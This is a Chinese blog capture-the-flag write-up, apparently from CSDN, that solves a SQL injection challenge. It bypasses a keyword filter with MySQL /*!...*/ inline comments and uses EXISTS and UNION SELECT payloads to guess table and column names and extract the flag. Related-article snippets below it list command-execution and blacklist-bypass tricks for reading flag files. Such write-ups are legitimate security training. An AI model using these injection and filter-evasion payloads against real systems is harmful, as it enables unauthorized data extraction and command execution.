flag到底过滤了什么东西?

最新推荐文章于 2024-06-01 16:25:22 发布
原创 最新推荐文章于 2024-06-01 16:25:22 发布 · 2.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了通过SQL注入尝试绕过过滤器的过程,包括测试'、空格、OR和AND关键字的有效性。当AND被过滤后,作者利用MySQL的/*!...*/注释符成功绕过过滤。接着,通过尝试不同的表名如admin、password,最终发现表名是flag。在确定表名后,作者继续猜测列名,经过尝试确认存在列名flag,从而成功获取到敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题路径

先提交1试试看:

在这里插入图片描述

发现显示是正常的,然后再提交id=1':

在这里插入图片描述

说明'是可以影响SQL语句的,并没有被过滤掉

然后我们尝试id=1' or ''='发现空格和or关键字都没有被过滤,很好

在这里插入图片描述

再尝试看and关键字,令id=1' and 1=1 or''=':发现报错,将and换成大写也不行,看来是被过滤掉了

接着尝试使用()、/**/、/*!*/等方法绕过,发现/*!关键字*/的方法是可以绕过的:

在这里插入图片描述

于是开始猜测表名:id=' or /*! exists*/ (/*!select*/ * /*!from*/ admin) /*!and*/ ''='表名不存在

这里说一下exists()的用法:查看是否有子返回集,例如上面的一条语句,首先执行的是exists()里面的命令,使用它的结果只有两个:true和false,要么查询所有数据,要么没有数据。

在这里插入图片描述
发现表名错误,那表名不是admin的话,可能是啥?试一下password,也不对,那我怎么知道这表名是什么,呃,,,对了,这里还有一个名字:flag呀,不会是你吧,试一下。
猜测表名为flag,
哎呀,还真是:
在这里插入图片描述
猜测列名存在name:
在这里插入图片描述

使用联合查询看列数:id=' /*!union*/ /*!select*/ 1,2 /*!from*/ flag /*!where*/ ''='

在这里插入图片描述
怎报错那,不应该啊。
哦,,,说明之前回显的name只是我们输入的参数而已

当我们构造id=' /*!union*/ /*!select*/ name /*!from*/ flag /*!where*/ ''='时却显示错误,

name 也不对,那,,,,我再试一下 flag吧!

当构造id=' /*!union*/ /*!select*/ flag /*!from*/ flag /*!where*/ ''='

显示出flag



flag啊,你终于出来了: flag{Y0u_@r3_5O_dAmn_90Od}
敏感词过滤 - DFA算法[确定有穷自动机]的Java 实现
简简单单Onlinezuozuo
07-25 4719
文章目录敏感词过滤 - DFA算法[确定有穷自动机]的Java 实现 敏感词过滤 - DFA算法[确定有穷自动机]的Java 实现 代码如下 package utils; import com.google.common.collect.Maps; import java.util.*; /** * @author Created by 谭健 on 2019/7/23. 星期二. 14:...
Spring Cloud Gateway高级特性之过滤器(Hoxton版本)
Trazen的专栏
07-04 6736
1.高级特性—过滤器(Filter) 路由过滤器可用于修改进入的HTTP请求和返回的HTTP响应,路由过滤器只能指定路由进行使用。Spring Cloud Gateway 内置了多种路由过滤器,他们都由GatewayFilter的工厂类来产生,下面将对各个过滤器进行一一说明 Spring Cloud Gateway 内置的过滤器工厂一览表如下: 1.1 AddRequestHeader GatewayFilter 通过配置name和value可以增加请求的header。 spring: cloud
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3791
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字符型注入 http:/...
ctf题库-FLAG
miko2018的博客
08-21 1万+
<题目> FLAG 请输入 FLAG,下面的页面会告诉你 FLAG 是否正确 解题链接: http://ctf5.shiyanbar.com/qwctf/flag-checker.html <解答> 打开连接。发现是一个对话框。 任意输入一个值后,提示“wrong…”,也就是说只有输入正确的值才能获得flag。 ※在Chrome下使用ctrl...
记一次过滤注释符的sql注入
as you know, nlp is fantasitc!
03-29 1613
写在前面:这个是一个很简单的联合注入,但是因为我对于这种通过输入来闭合,从而实现注入不是很熟悉,因此记录一下 1、fuzz测试 发现会给出过滤的字段 black_list is /if|and|\s|#|--/i 不能通过注释掉后面的内容来闭合,所以这里要通过 '构造闭合 用1'or'1'='1测试有提示,说明闭合成功 2、联合注入 爆表名 username='/**/union/**/select/**/concat(table_name)/**/from/**/information_schema.
sql注释符注入防御_SQL注入(过滤空格和--+等注释符)
weixin_29022821的博客
01-13 736
1、地址:http://ctf5.shiyanbar.com/web/index_2.php(过滤了空格和--+等注释符)思路:确定注入参数值类型,直接输入单引号,根据报错信息确定参数值类型为字符型,如下图所示。2、正常思路输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1,仍然报错,信息为SQLi detected...
Flag】-PHP-正则绕过
soldi_er的博客
09-02 2572
文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考 最近RCTF分站赛要开始了,梳理一些知识。 【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {
为什么 SELECT SF_GET_UNICODE_FLAG()能查到东西, 但是SELECT VALUE FROM V$PARAMETER WHERE NAME='UNICODE_FLAG';查不到呢
最新发布
07-15
我们正在分析一个现象:在达梦数据库中,使用系统函数`SF_GET_UNICODE_FLAG()`可以返回字符集标志,但通过查询`V$PARAMETER`视图(`SELECT VALUE FROM V$PARAMETER WHERE NAME='UNICODE_FLAG';`)却无法获取到该参数...
Apache HTTP 过滤器filter、开源WAF(ModSecurity)、Apache 模块开发
西京刀客
03-08 3002
在编写Apache模块时,需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外,需要参考Apache的文档和API参考手册来编写代码和构建模块。
Linux系统下绕过某个关键字的小技巧,比如flag关键字
weixin_44632787的博客
07-24 2776
Linux系统下绕过某个关键字的小技巧,比如绕过flag关键字 首先先在linux系统下创建一个文件名为flag.txt的文件。里面的内容为:This is Flag! 这里提供几个绕过某个关键字的小技巧。 单引号绕过: cat fla’g’.txt 双引号绕过: cat fla"g".txt 反斜线绕过: cat f\lag.txt $+数字绕过: cat fl$1ag.txt,cat fl$2ag.txt,cat fl$3ag.txt $@绕过: cat fl$@ag.txt Base6
绕过之cat|/ flag
m0_61011147的博客
09-06 2991
绕过之cat|/ flag
sql注入关键字过滤_过滤in,or字符的sql注入学习
weixin_39696518的博客
12-09 839
在sql注入中,有时候会遇见一些过滤,将in或者or之类的匹配出来,这样传统的通过information_schema是得不出来列名的。这里引入一个sys的一个表可以看到这里有很多表名。这里有很多$符号的表名,这些表单里面就存在很多信息。这里就出现了我创建的一个表。这里还可以用select table_name from sys.x$schema_table_statistics whe...
CTFWeb-命令执行漏洞过滤的绕过姿势
热门推荐
道阻且长,行则将至
04-29 2万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
命令执行及绕过
qq_51175992的博客
07-10 369
CTF中常见的题型——命令指向及绕过
CTF 命令执行绕过总结
jnszstmei的博客
06-01 1309
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
web 各种绕过
TMNOA的博客
04-09 750
查看当前目录下的所有文件名 ,开始构造。localeconv() 函数返回一包含本地数字及货币格式信息的数组,第一个值为”.”。
命令执行的题目加理解
zbbjya的博客
03-21 1007
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.youkuaiyun.com/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
CTF命令执行小总结
n00bk1ng的博客
05-18 1973
文章目录简介命令执行常见命令及解释执行常见系统命令函数绕过姿势绕过总结函数套娃特殊题无字母无数字命令执行通过文件包含、文件上传拿shell进行命令执行FFI类型题例题ctfshow web31ctfshow web124 简介 命令执行 命令执行:攻击者可以通过web应用执行系统命令,从而获取敏感信息,甚至拿到shell权限等等,造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。 常见命令及解释 执行常见系统命令 常见的系统命令可以进行命令执行: awk 格式:awk'{printf
每天一道ctf
whisper921的博客
10-20 1429
ctf题
使用packageInfo.applicationInfo.flags & ApplicationInfo.FLAG_SYSTEM) == 0过滤应用之后不显示相册,计算器等应用
06-07
这是因为相册和计算器等应用程序被标记为系统应用程序,它们的ApplicationInfo.FLAG_SYSTEM标志被设置为1。因此,当使用(packageInfo.applicationInfo.flags & ApplicationInfo.FLAG_SYSTEM) == 0来过滤应用程序列表时,这些应用程序会被过滤掉,不会显示在列表中。如果您想显示这些应用程序,可以考虑将过滤条件更改为(packageInfo.applicationInfo.flags & ApplicationInfo.FLAG_UPDATED_SYSTEM_APP) == 0,这将过滤掉仅为系统应用程序更新的应用程序,而不是所有系统应用程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值